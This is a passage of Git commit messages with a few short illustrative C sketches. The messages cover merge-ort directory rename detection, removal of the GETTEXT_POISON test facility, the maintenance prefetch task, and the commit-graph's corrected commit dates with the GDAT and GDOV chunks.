wrong, though (peeling is a property of an object, so two refs
pointing to the same object would peel identically).
- the original took care not to touch the peeled out-parameter unless
we found something to put in it. But no caller cares about this, and
anyway, it is enforced by peel_object() itself (and even in the
optimized iterator case, that's where we eventually end up). We can
shorten the code and avoid an extra copy by just passing the
out-parameter through the stack.
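The overall shape of the new interface can be sketched with toy types. Everything below is hypothetical (the toy_* names, the 4-byte oid, the fake peeling rule); it only models the idea of taking an oid, using the current iterator's peeled value when it matches by pointer or by value, and falling back to a plain object peel otherwise.

```c
#include <stddef.h>
#include <string.h>

struct toy_oid {
	unsigned char hash[4];
};

/* What the iterator currently points at, plus its already-known peeled value. */
struct toy_iter {
	const struct toy_oid *oid;
	struct toy_oid peeled;
};

static const struct toy_iter *toy_current_iter;	/* global "current iterator" */
static int toy_slow_peels;			/* how often the fallback ran */

void toy_set_current_iter(const struct toy_iter *iter)
{
	toy_current_iter = iter;
}

int toy_slow_peel_count(void)
{
	return toy_slow_peels;
}

/* Stand-in for peel_object(): pretend that peeling flips the first byte. */
int toy_peel_object(const struct toy_oid *oid, struct toy_oid *out)
{
	toy_slow_peels++;
	*out = *oid;
	out->hash[0] ^= 0xff;
	return 0;
}

/* Take an oid, not a refname; use the iterator's value when it matches. */
int toy_peel_iterated_oid(const struct toy_oid *oid, struct toy_oid *out)
{
	const struct toy_iter *it = toy_current_iter;

	if (it && (it->oid == oid ||
		   !memcmp(it->oid->hash, oid->hash, sizeof(oid->hash)))) {
		*out = it->peeled;	/* fast path: no object lookup */
		return 0;
	}
	return toy_peel_object(oid, out);	/* fallback when not iterating */
}
```

Because the lookup is keyed on the oid the callback was handed, the result always describes that oid, and the out-parameter is passed straight through to the fallback.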
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in previous commits we are removing the use of
GIT_TEST_GETTEXT_POISON=false. These tests all relied on the facility
being off. It is always off after an earlier change, but we hadn't
removed the redundant assignments to "false" in the tests.
I'm preserving the deletion of "error" lines in 38b9197a76 (t5411:
add basic test cases for proc-receive hook, 2020-08-27), since it turns out
that's useful even without GIT_TEST_GETTEXT_POISON=true in
play. Update a comment added in that commit to note that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This removes the ability to inject "poison" gettext() messages via the
GIT_TEST_GETTEXT_POISON special test setup.
I initially added this as a compile-time option in bb946bba76 (i18n:
add GETTEXT_POISON to simulate unfriendly translator, 2011-02-22), and
most recently modified to be toggleable at runtime in
6cdccfce1e (i18n: make GETTEXT_POISON a runtime option, 2018-11-08).
The reason for its removal is that the trade-off of maintaining it
vs. what it's getting us has long since flipped. When gettext was
integrated in 5e9637c629 (i18n: add infrastructure for translating
Git with gettext, 2011-11-18) there was understandable concern on the
Git ML that in marking messages for translation en-masse we'd
inadvertently mark plumbing messages. The GETTEXT_POISON facility was
a way to smoke those out via our test suite.
Nowadays however we're done (or almost entirely done) with any marking
of messages for translation. New messages are usually marked by their
authors, who'll know whether it makes sense to translate them or
not. If not, any errors in marking the messages are much more likely to
be spotted in review than in the initial deluge of i18n patches in
the 2011-2012 era.
So let's just remove this. This leaves the test suite in a state where
we still have a lot of test_i18n, C_LOCALE_OUTPUT
etc. uses. Subsequent commits will remove those too.
The change to t/lib-rebase.sh is a selective revert of the relevant
part of f2d17068fd (i18n: rebase-interactive: mark comments of squash
for translation, 2016-06-17), and the comment in
t/t3406-rebase-message.sh is from c7108bf9ed (i18n: rebase: mark
messages for translation, 2012-07-25).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A subsequent commit will remove GETTEXT_POISON entirely. Let's start
by removing the CI jobs that enable the option.
We cannot just remove the job because the CI is implicitly depending
on the "poison" job being a sort of "default" job in the sense that
it's the job that was otherwise run with the default compiler, no
other GIT_TEST_* options etc. So let's keep it under the name
"linux-gcc-default".
This means we can remove the initial "make test" from the "linux-gcc"
job (it does another one after setting a bunch of GIT_TEST_*
variables).
I'm not doing that because it would conflict with the in-flight
334afbc76f (tests: mark tests relying on the current default for
`init.defaultBranch`, 2020-11-18) (currently on the "seen" branch, so
the SHA-1 will almost definitely change). It's going to use that "make
test" again for different reasons, so let's preserve it for now.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `SKIP_DASHED_BUILT_INS` is specified in `config.mak`, the dashed
form of the built-ins is still generated.
Move the `SKIP_DASHED_BUILT_INS` handling to after `config.mak` is
read so that the setting takes effect.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/ort-directory-rename: (28 commits)
merge-ort: fix a directory rename detection bug
merge-ort: process_renames() now needs more defensiveness
merge-ort: implement apply_directory_rename_modifications()
merge-ort: add a new toplevel_dir field
merge-ort: implement handle_path_level_conflicts()
merge-ort: implement check_for_directory_rename()
merge-ort: implement apply_dir_rename() and check_dir_renamed()
merge-ort: implement compute_collisions()
merge-ort: modify collect_renames() for directory rename handling
merge-ort: implement handle_directory_level_conflicts()
merge-ort: implement compute_rename_counts()
merge-ort: copy get_renamed_dir_portion() from merge-recursive.c
merge-ort: add outline of get_provisional_directory_renames()
merge-ort: add outline for computing directory renames
merge-ort: collect which directories are removed in dirs_removed
merge-ort: initialize and free new directory rename data structures
merge-ort: add new data structures for directory rename detection
merge-ort: add implementation of type-changed rename handling
merge-ort: add implementation of normal rename handling
merge-ort: add implementation of rename collisions
...
As noted in commit 902c521a35 ("t6423: more involved directory rename
test", 2020-10-15), when we have a case where
* dir/subdir/ has several files
* almost all files in dir/subdir/ are renamed to folder/subdir/
* one of the files in dir/subdir/ is renamed to folder/subdir/newsubdir/
* the other side of history (that doesn't do the renames) adds a
new file to dir/subdir/
Then for the majority of the file renames, the directory rename of
dir/subdir/ -> folder/subdir/
is actually not represented that way but as
dir/ -> folder/
We also had one rename that was represented as
dir/subdir/ -> folder/subdir/newsubdir/
Now, since there's a new file in dir/subdir/, where does it go? Well,
there's only one rule for dir/subdir/, so the code previously noted that
this rule had the "majority" of the one "relevant" rename and thus
erroneously used it to place the file in folder/subdir/newsubdir/. We
really want the heavy weight associated with dir/ -> folder/ to also be
treated as dir/subdir/ -> folder/subdir/, so that we correctly place the
file in folder/subdir/.
Add a bunch of logic to make sure that we use all relevant renamings in
directory rename detection.
Note that testcase 12f of t6423 still fails after this, but it gets
further than merge-recursive does. There are some performance related
bits in that testcase (the region_enter messages) that do not yet
succeed, but the rest of the testcase works after this patch.
Subsequent patch series will fix up the performance side.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since directory rename detection adds new paths to opt->priv->paths and
removes old ones, process_renames() needs to now check whether
pair->one->path actually exists in opt->priv->paths instead of just
assuming it does.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function roughly follows the same outline as the function of the
same name from merge-recursive.c, but the code diverges in multiple
ways due to some special considerations:
* merge-ort's version needs to update opt->priv->paths with any new
paths (and opt->priv->paths points to struct conflict_infos which
track quite a bit of metadata for each path); merge-recursive's
version would directly update the index
* merge-ort requires that opt->priv->paths has any leading directories
of any relevant files also be included in the set of paths. And
due to pointer equality requirements on merged_info.directory_name,
we have to be careful how we compute and insert these.
* due to the above requirements on opt->priv->paths, merge-ort's
version starts with a long comment to explain all the special
considerations that need to be handled
* merge-ort can use the full data stored in opt->priv->paths to avoid
making expensive get_tree_entry() calls to regather the necessary
data.
* due to messages being deferred automatically in merge-ort, this is
the best place to handle conflict messages whereas in
merge-recursive.c they are deferred manually so that processing of
entries does all the printing
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Due to the string-equality-iff-pointer-equality requirements placed on
merged_info.directory_name, apply_directory_rename_modifications() will
need to have access to the exact toplevel directory name string pointer
and can't just use a new empty string. Store it in a field that we can
use.
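The "string equality iff pointer equality" requirement is essentially string interning. A minimal sketch of that idea follows, with a hypothetical toy_intern() helper and a small fixed-size table. It is not how merge-ort stores its directory names, only an illustration of why the exact pointer has to be kept around.

```c
#include <stdlib.h>
#include <string.h>

#define TOY_MAX_INTERNED 64

static char *toy_interned[TOY_MAX_INTERNED];
static size_t toy_interned_nr;

/*
 * Return the one canonical pointer for the contents of `s`, or NULL if
 * the table is full or allocation fails. Equal strings always yield
 * the same pointer, so callers may compare pointers instead of bytes.
 */
const char *toy_intern(const char *s)
{
	size_t i, len;
	char *copy;

	for (i = 0; i < toy_interned_nr; i++)
		if (!strcmp(toy_interned[i], s))
			return toy_interned[i];
	if (toy_interned_nr == TOY_MAX_INTERNED)
		return NULL;
	len = strlen(s) + 1;
	copy = malloc(len);
	if (!copy)
		return NULL;
	memcpy(copy, s, len);
	toy_interned[toy_interned_nr++] = copy;
	return copy;
}
```

A fresh "" literal used for the toplevel directory would compare equal by content but not by pointer, which is why the canonical pointer needs to be stored somewhere reachable.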
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is copied from merge-recursive.c, with minor tweaks due to:
* using strmap API
* merge-ort not using the non_unique_new_dir field, since later
performance improvements will make it entirely unnecessary
* adding a new path_in_way() function that uses opt->priv->paths
instead of doing an expensive tree_has_path() lookup to see if
a tree has a given path.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is copied from merge-recursive.c, with minor tweaks due to using strmap
API and the fact that it can use opt->priv->paths to get all pathnames that
exist instead of taking a tree object.
This depends on a new function, handle_path_level_conflicts(), which
just has a placeholder die-not-yet-implemented implementation for now; a
subsequent patch will implement it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both of these are copied from merge-recursive.c, with just minor tweaks
due to using strmap API and not having a non_unique_new_dir field.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is nearly a wholesale copy of compute_collisions() from
merge-recursive.c, and the logic remains the same, but it has been
tweaked slightly due to:
* using strmap.h API (instead of direct hashmaps)
* allocation/freeing of data structures were done separately in
merge_start() and clear_or_reinit_internal_opts() in an earlier
patch in this series
* there is no non_unique_new_dir data field in merge-ort; that will
be handled a different way
It does depend on two new functions, apply_dir_rename() and
check_dir_renamed() which were introduced with simple
die-not-yet-implemented shells and will be implemented in subsequent
patches.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
collect_renames() is similar to merge-recursive.c's get_renames(), but
lacks the directory rename handling found in the latter. Port that code
structure over to merge-ort. This introduces three new
die-not-yet-implemented functions that will be defined in future
commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is modelled on the version of handle_directory_level_conflicts()
from merge-recursive.c, but is massively simplified due to the following
factors:
* strmap API provides simplifications over using direct hashmap
* we have a dirs_removed field in struct rename_info that we have an
easy way to populate from collect_merge_info(); this was already
used in compute_rename_counts() and thus we do not need to check
for condition #2.
* The removal of condition #2 by handling it earlier in the code also
obviates the need to check for condition #3 -- if both sides renamed
a directory, meaning that the directory no longer exists on either
side, then neither side could have added any new files to that
directory, and thus there are no files whose locations we need to
move due to such a directory rename.
In fact, the same logic that makes condition #3 irrelevant means
condition #1 is also irrelevant so we could drop this function.
However, it is cheap to check if both sides rename the same directory,
and doing so can save future computation. So, simply remove any
directories that both sides renamed from the list of directory renames.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is based on the first half of get_directory_renames() from
merge-recursive.c; as part of the implementation, factor out a routine,
increment_count(), to update the bookkeeping to track the number of
items renamed into new directories.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is based on merge-recursive.c's get_directory_renames(),
except that the first half has been split out into a not-yet-implemented
compute_rename_counts(). The primary difference here is our lack of the
non_unique_new_dir boolean in our strmap. The lack of that field will
at first cause us to fail testcase 2b of t6423; however, future
optimizations will obviate the need for that ugly field so we have just
left it out.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Port some directory rename handling changes from merge-recursive.c's
detect_and_process_renames() to the same-named function of merge-ort.c.
This does not yet add any use or handling of directory renames, just the
outline for where we start to compute them. Thus, a future patch will
port additional changes to merge-ort's detect_and_process_renames().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove diagnostics that haven't been emitted by "fsck" or its
predecessors for around 15 years. This documentation was added in
c64b9b8860 (Reference documentation for the core git commands.,
2005-05-05), but was out-of-date quickly after that.
Notes on individual diagnostics:
- "expect dangling commits": Added in bcee6fd8e7 (Make 'fsck' able
to[...], 2005-04-13), documented in c64b9b8860. Not emitted since
1024932f01 (fsck-cache: walk the 'refs' directory[...],
2005-05-18).
- "missing sha1 directory": Added in 20222118ae (Add first cut at
"fsck-cache"[...], 2005-04-08), documented in c64b9b8860. Not
emitted since 230f13225d (Create object subdirectories on demand,
2005-10-08).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Clarify that, when the packfile-uri feature is used, the client should
not assume that the extra packfiles downloaded would only contain a
single blob, but support packfiles containing multiple objects of all
types.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The tests for the 'prefetch' task create remotes and fetch refs into
'refs/prefetch/<remote>/' and tags into 'refs/tags/'. These tests use
the remotes to create objects not intended to be seen by the "local"
repository.
In that sense, the incremental-repack tasks did not have these objects
and refs in mind. That test replaces the object directory with a
specific pack-file layout for testing the batch-size logic. However,
this causes some operations to start showing warnings such as:
error: refs/prefetch/remote1/one does not point to a valid object!
error: refs/tags/one does not point to a valid object!
This only shows up if you run the tests verbosely and watch the output.
It caught my eye and I _thought_ that there was a bug where 'git gc' or
'git repack' wouldn't check 'refs/prefetch/' before pruning objects.
That is incorrect. Those commands do handle 'refs/prefetch/' correctly.
All that is left is to clean up the tests in t7900-maintenance.sh to
remove these tags and refs that are not being repacked for the
incremental-repack tests. Use update-ref to ensure this works with all
ref backends.
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'prefetch' task fetches refs from all remotes and places them in the
refs/prefetch/<remote>/ refspace. As this task is intended to run in the
background, this allows users to keep their local data very close to the
remote servers' data while not updating the users' understanding of the
remote refs in refs/remotes/<remote>/.
However, this can clutter 'git log' decorations with copies of the refs
with the full name 'refs/prefetch/<remote>/<branch>'.
The log.excludeDecoration config option was added in a6be5e67 (log: add
log.excludeDecoration config option, 2020-05-16) for exactly this
purpose.
Ensure we set this only for users that would benefit from it by
assigning it at the beginning of the prefetch task. Other alternatives
would be during 'git maintenance register' or 'git maintenance start',
but those might assign the config even when the prefetch task is
disabled by existing config. Further, users could run 'git maintenance
run --task=prefetch' using their own scripting or scheduling. This
provides the best coverage to automatically update the config when
valuable.
It is improbable, but possible, that users might want to run the
prefetch task _and_ see these refs in their log decorations. This seems
incredibly unlikely to me, but users can always opt-in on a
command-by-command basis using --decorate-refs=refs/prefetch/.
Test that this works in a few cases. In particular, ensure that our
assignment of log.excludeDecoration=refs/prefetch/ is additive to other
existing exclusions. Further, ensure we do not add multiple copies in
multiple runs.
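The two properties tested here (additive, and no duplicates across runs)
can be sketched as follows. This is only an illustration under the
assumption that a multi-valued config key behaves like a list of strings;
struct multi_value and add_unique() are hypothetical names, not Git's
config API.

```c
#include <stddef.h>
#include <string.h>

#define MAX_VALUES 8

/* Hypothetical stand-in for a multi-valued config key. */
struct multi_value {
	const char *values[MAX_VALUES];
	size_t nr;
};

/*
 * Append `value` unless it is already present.
 * Returns 1 if added, 0 if already present, -1 if the list is full.
 */
static int add_unique(struct multi_value *mv, const char *value)
{
	size_t i;

	for (i = 0; i < mv->nr; i++)
		if (!strcmp(mv->values[i], value))
			return 0; /* a second run must not add a copy */
	if (mv->nr == MAX_VALUES)
		return -1;
	mv->values[mv->nr++] = value; /* existing values are left untouched */
	return 1;
}
```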
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we create a commit with multiple signatures, neither of these
signatures includes the other. Consequently, when we produce the
payload which has been signed so we can verify the commit, we must strip
off any other signatures, or the payload will differ from what was
signed. Do so, and in preparation for verifying with multiple
algorithms, pass the algorithm we want to verify into
parse_signed_commit.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we'll want to pass some of the arguments of find_subpos
to strbuf_detach, which takes a size_t. This is fine on systems where
that's the same size as unsigned long, but that isn't the case on all
systems. Moreover, size_t makes sense since it's not possible to use a
buffer here that's larger than memory anyway.
Let's switch each use to size_t for these lengths in
grab_sub_body_contents and find_subpos.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With generation data chunk and corrected commit dates implemented, let's
update the technical documentation for commit-graph.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
091f4cf (commit: don't use generation numbers if not needed,
2018-08-30) changed paint_down_to_common() to use commit dates instead
of generation numbers v1 (topological levels) as the performance
regressed on certain topologies. With generation number v2 (corrected
commit dates) implemented, we no longer have to rely on commit dates and
can use generation numbers.
For example, the command `git merge-base v4.8 v4.9` on the Linux
repository walks 167468 commits, taking 0.135s for committer date and
167496 commits, taking 0.157s for corrected committer date respectively.
Although Git walks nearly the same number of commits with corrected
commit dates as with commit dates, the process is slower because each
comparison has to access a commit-slab (for corrected committer date)
instead of a struct member (for committer date).
This change incidentally broke the fragile t6404-recursive-merge test.
t6404-recursive-merge sets up a unique repository where all commits have
the same committer date without a well-defined merge-base.
While running tests with GIT_TEST_COMMIT_GRAPH unset, we use committer
date as a heuristic in paint_down_to_common(). 6404.1 'combined merge
conflicts' merges commits in the order:
- Merge C with B to form an intermediate commit.
- Merge the intermediate commit with A.
With GIT_TEST_COMMIT_GRAPH=1, we write a commit-graph and subsequently
use the corrected committer date, which changes the order in which
commits are merged:
- Merge A with B to form an intermediate commit.
- Merge the intermediate commit with C.
While resulting repositories are equivalent, 6404.4 'virtual trees were
processed' fails with GIT_TEST_COMMIT_GRAPH=1 as we are selecting
different merge-bases and thus have different object ids for the
intermediate commits.
As this has already caused problems (as noted in 859fdc0 (commit-graph:
define GIT_TEST_COMMIT_GRAPH, 2018-08-29)), we disable commit graph
within t6404-recursive-merge.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since there are released versions of Git that understand generation
numbers in the commit-graph's CDAT chunk but do not understand the GDAT
chunk, the following scenario is possible:
1. "New" Git writes a commit-graph with the GDAT chunk.
2. "Old" Git writes a split commit-graph on top without a GDAT chunk.
If each layer of split commit-graph is treated independently, as it was
the case before this commit, with Git inspecting only the current layer
for chunk_generation_data pointer, commits in the lower layer (one with
GDAT) would have corrected commit date as their generation number,
while commits in the upper layer would have topological levels as their
generation. Corrected commit dates usually have much larger values than
topological levels. This means that if we take two commits, one from the
upper layer, and one reachable from it in the lower layer, then the
expectation that the generation of a parent is smaller than the
generation of a child would be violated.
It is difficult to expose this issue in a test. Since we _start_ with
artificially low generation numbers, any commit walk that prioritizes
generation numbers will walk all of the commits with high generation
number before walking the commits with low generation number. In all the
cases I tried, the commit-graph layers themselves "protect" any
incorrect behavior since none of the commits in the lower layer can
reach the commits in the upper layer.
This issue would manifest itself as a performance problem in this case,
especially with something like "git log --graph" since the low
generation numbers would cause the in-degree queue to walk all of the
commits in the lower layer before allowing the topo-order queue to write
anything to output (depending on the size of the upper layer).
Therefore, when writing the new layer in split commit-graph, we write a
GDAT chunk only if the topmost layer has a GDAT chunk. This guarantees
that if a layer has GDAT chunk, all lower layers must have a GDAT chunk
as well.
Rewriting layers follows similar approach: if the topmost layer below
the set of layers being rewritten (in the split commit-graph chain)
exists, and it does not contain GDAT chunk, then the result of rewrite
does not have GDAT chunks either.
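The rule and the invariant it guarantees can be sketched as below. The
array has_gdat[] (index 0 is the base layer, the last index is the topmost
existing layer) and both function names are hypothetical; treating an
empty chain as "write GDAT" is an assumption taken from step 1 of the
scenario above.

```c
#include <stddef.h>

/* Should a new layer written on top of the chain contain a GDAT chunk? */
static int new_layer_gets_gdat(const int *has_gdat, size_t nr_layers)
{
	/* Assumption: with no existing layer, "New" Git writes GDAT. */
	return nr_layers == 0 || has_gdat[nr_layers - 1];
}

/* Invariant: if a layer has GDAT, every layer below it has GDAT too. */
static int chain_is_consistent(const int *has_gdat, size_t nr_layers)
{
	size_t i;

	for (i = 1; i < nr_layers; i++)
		if (has_gdat[i] && !has_gdat[i - 1])
			return 0;
	return 1;
}
```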
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As discovered by Ævar, we cannot increment graph version to
distinguish between generation numbers v1 and v2 [1]. Thus, one of the
prerequisites for implementing generation number v2 was to
distinguish between graph versions in a backwards compatible manner.
We are going to introduce a new chunk called Generation DATa chunk (or
GDAT). GDAT will store corrected committer date offsets whereas CDAT
will still store topological level.
Old Git does not understand GDAT chunk and would ignore it, reading
topological levels from CDAT. New Git can parse GDAT and take advantage
of newer generation numbers, falling back to topological levels when
GDAT chunk is missing (as it would happen with a commit-graph written
by old Git).
We introduce a test environment variable 'GIT_TEST_COMMIT_GRAPH_NO_GDAT'
which forces commit-graph file to be written without generation data
chunk to emulate a commit-graph file written by old Git.
To minimize the space required to store corrected commit date, Git
stores corrected commit date offsets into the commit-graph file, instead
of corrected commit dates. This saves us 4 bytes per commit, decreasing
the GDAT chunk size by half, but it's possible for the offset to
overflow the 4-bytes allocated for storage. As such overflows are and
should be exceedingly rare, we use the following overflow management
scheme:
We introduce a new commit-graph chunk, Generation Data OVerflow ('GDOV')
to store corrected commit dates for commits with offsets greater than
GENERATION_NUMBER_V2_OFFSET_MAX.
If the offset is greater than GENERATION_NUMBER_V2_OFFSET_MAX, we set
the MSB of the offset and the other bits store the position of corrected
commit date in GDOV chunk, similar to how Extra Edge List is maintained.
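A minimal sketch of this scheme follows. The two constants are
assumptions chosen to match the description (a 31-bit offset plus the MSB
as overflow flag); encode_gdat() and decode_gdat() are hypothetical
helpers, and the caller is assumed to provide a large enough gdov[] array.

```c
#include <stdint.h>

/* Assumed values for illustration only. */
#define OFFSET_MAX      ((UINT32_C(1) << 31) - 1)
#define OFFSET_OVERFLOW (UINT32_C(1) << 31)

/*
 * Return the 32-bit word to store in the GDAT slot. If the offset is too
 * large, append the full corrected date to gdov[] and return the overflow
 * flag combined with its position there.
 */
static uint32_t encode_gdat(uint64_t corrected_date, uint64_t committer_date,
			    uint64_t *gdov, uint32_t *gdov_nr)
{
	uint64_t offset = corrected_date - committer_date;

	if (offset > OFFSET_MAX) {
		gdov[*gdov_nr] = corrected_date;
		return OFFSET_OVERFLOW | (*gdov_nr)++;
	}
	return (uint32_t)offset;
}

/* Recover the corrected commit date from a GDAT word. */
static uint64_t decode_gdat(uint32_t word, uint64_t committer_date,
			    const uint64_t *gdov)
{
	if (word & OFFSET_OVERFLOW)
		return gdov[word & ~OFFSET_OVERFLOW];
	return committer_date + word;
}
```

An offset of exactly 2 ^ 31 is the smallest one that takes the overflow
path in this sketch.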
We test the overflow-related code with the following repo history:
          F - N - U
         /         \
U - N - U           N
         \         /
          N - F - N
Where the commits denoted by U have committer date of zero seconds
since Unix epoch, the commits denoted by N have committer date of
1112354055 (default committer date for the test suite) seconds since
Unix epoch and the commits denoted by F have committer date of
(2 ^ 31 - 2) seconds since Unix epoch.
The largest offset observed is 2 ^ 31, just large enough to overflow.
[1]: https://lore.kernel.org/git/87a7gdspo4.fsf@evledraar.gmail.com/
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With most of preparations done, let's implement corrected commit date.
The corrected commit date for a commit is defined as:
* A commit with no parents (a root commit) has corrected commit date
equal to its committer date.
* A commit with at least one parent has corrected commit date equal to
the maximum of its commit date and one more than the largest corrected
commit date among its parents.
As a special case, a root commit with timestamp of zero (01.01.1970
00:00:00Z) has corrected commit date of one, to be able to distinguish
from GENERATION_NUMBER_ZERO (that is, an uncomputed corrected commit
date).
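The definition above can be sketched as a small recursive function.
struct toy_commit is a hypothetical stand-in rather than Git's struct
commit, and recursion is used only for brevity; it says nothing about how
the commit-graph code actually walks history.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical toy commit with just the fields the definition needs. */
struct toy_commit {
	uint64_t committer_date;     /* seconds since the Unix epoch */
	struct toy_commit **parents;
	size_t nr_parents;
	uint64_t corrected_date;     /* 0 means "not computed yet" */
};

static uint64_t corrected_commit_date(struct toy_commit *c)
{
	uint64_t result = c->committer_date;
	size_t i;

	if (c->corrected_date)
		return c->corrected_date; /* already computed */

	/* One more than the largest corrected date among the parents. */
	for (i = 0; i < c->nr_parents; i++) {
		uint64_t from_parent = corrected_commit_date(c->parents[i]) + 1;
		if (from_parent > result)
			result = from_parent;
	}

	/* Special case: a root commit at timestamp zero gets one. */
	if (!result)
		result = 1;

	c->corrected_date = result;
	return result;
}
```

For a chain root (date 0) <- A (date 100) <- B (date 50), this yields 1,
100 and 101: B's skewed clock is corrected to one more than its parent.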
To minimize the space required to store corrected commit date, Git
stores corrected commit date offsets into the commit-graph file. The
corrected commit date offset for a commit is defined as the difference
between its corrected commit date and actual commit date.
Storing corrected commit date requires sizeof(timestamp_t) bytes, which
in most cases is 64 bits (uintmax_t). However, corrected commit date
offsets can be safely stored using only 32-bits. This halves the size
of GDAT chunk, which is a reduction of around 6% in the size of
commit-graph file.
However, using offsets can be problematic if a commit is malformed but valid
and has committer date of 0 Unix time, as the offset would be the same
as corrected commit date and thus require 64-bits to be stored properly.
While Git does not write out offsets at this stage, Git stores the
corrected commit dates in member generation of struct commit_graph_data.
It will begin writing commit date offsets with the introduction of
generation data chunk.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a preparatory step for introducing corrected commit dates, let's
return timestamp_t values from commit_graph_generation(), use
timestamp_t for local variables and define GENERATION_NUMBER_INFINITY
as (2 ^ 63 - 1) instead.
We rename GENERATION_NUMBER_MAX to GENERATION_NUMBER_V1_MAX to
represent the largest topological level we can store in the commit data
chunk.
With corrected commit dates implemented, we will have two such *_MAX
variables to denote the largest offset and largest topological level
that can be stored.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a later commit we will introduce corrected commit date as the
generation number v2. Corrected commit dates will be stored in the new
separate Generation Data chunk. However, to ensure backwards
compatibility with "Old" Git we need to continue to write generation
number v1 (topological levels) to the commit data chunk. Thus, we need
to compute and store both versions of generation numbers to write the
commit-graph file.
Therefore, let's introduce a commit-slab `topo_level_slab` to store
topological levels; corrected commit date will be stored in the member
`generation` of struct commit_graph_data.
The macros `GENERATION_NUMBER_INFINITY` and `GENERATION_NUMBER_ZERO`
mark commits not in the commit-graph file and commits written by a
version of Git that did not compute generation numbers respectively.
Generation numbers are computed identically for both kinds of commits.
A "slab-miss" should return `GENERATION_NUMBER_INFINITY` as the commit
is not in the commit-graph file. However, since the slab is
zero-initialized, it returns 0 (or rather `GENERATION_NUMBER_ZERO`).
Thus, we no longer need to check if the topological level of a commit is
`GENERATION_NUMBER_INFINITY`.
We will add a pointer to the slab in `struct write_commit_graph_context`
and `struct commit_graph` to populate the slab in
`fill_commit_graph_info` if the commit has a pre-computed topological
level as in case of split commit-graphs.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a preparatory step to implement generation number v2, we add tests to
ensure Git can read and parse commit-graph files without Generation Data
chunk. These files represent commit-graph files written by Old Git and
are necessary for backward compatibility.
We extend run_three_modes() and test_three_modes() to *_all_modes() with
the fourth mode being "commit-graph without generation data chunk".
